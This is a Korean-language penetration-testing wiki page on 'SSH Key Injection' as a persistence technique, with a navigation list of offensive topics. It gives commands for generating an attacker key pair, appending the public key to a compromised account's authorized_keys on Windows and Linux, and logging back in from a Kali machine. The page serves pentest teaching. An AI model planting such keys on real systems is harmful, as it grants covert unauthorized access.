펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Ticket
      • DC Shadow
      • RID Hijacking
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • WriteOwner
        • GenericAll
        • GenericWrite
        • WriteSPN
        • AddMembers
        • WriteProperty
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Ticket
      • KrbRelayUp
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • DCSync
      • LSASS
      • AS-REP-Roasting
      • AS Requested Service Tickets
      • Kerberoasting
      • Targeted Kerberoast
      • Shadow Credentials
      • Backup Operators
      • SeEnableDelegationPrivilege
    • Windows
      • Unattended File
      • Browser Stored Credentials
      • NTLM Relay
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Port Forwarding
    • SMB/Windows Admin Shares
    • RDP
    • DCOM
    • WinRM
    • Domain Trust Discovery
  • ETC
    • CS
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Active Directory Trusts
      • Delegation
      • OAuth 2.0
      • S4U
    • Tools
      • Cobalt Strike
      • BloodHound
      • Certipy-ad
      • LDAP Search
      • Hydra
Powered by GitBook
On this page

Was this helpful?

Export as PDF
  1. 지속성
  2. Local

SSH Key Injection

장악한 계정의 컴퓨터에 SSH 프로토콜이 설치되어 있을 경우

공격자의 SSH 공개키를 장악한 계정의 인증된 키 목록에 추가함으로써

공격자는 언제든지 자신의 비밀키를 이용하여 SSH를 통한 쉘을 획득할 수 있습니다.

# Kali 머신에서 키 생성
ssh-keygen -t rsa -b 4096

# 생성한 공개키를 장악한 계정의 authorized_keys에 복사
echo <id_rsa.pub> >> C:\Users\<USER>\.ssh\authorized_keys

# Kali 머신에서 원격 접속
ssh -i id_rsa <USER>@<IP>
# Kali 머신에서 키 생성
ssh-keygen -t rsa -b 4096

# 생성한 공개키를 장악한 계정의 authorized_keys에 복사
echo <id_rsa.pub> >> ~/.ssh/authorized_keys

# Kali 머신에서 원격 접속
ssh -i id_rsa <USER>@<IP>
PreviousWMI Event SubscriptionNextDLL Hijacking

Last updated 5 months ago

Was this helpful?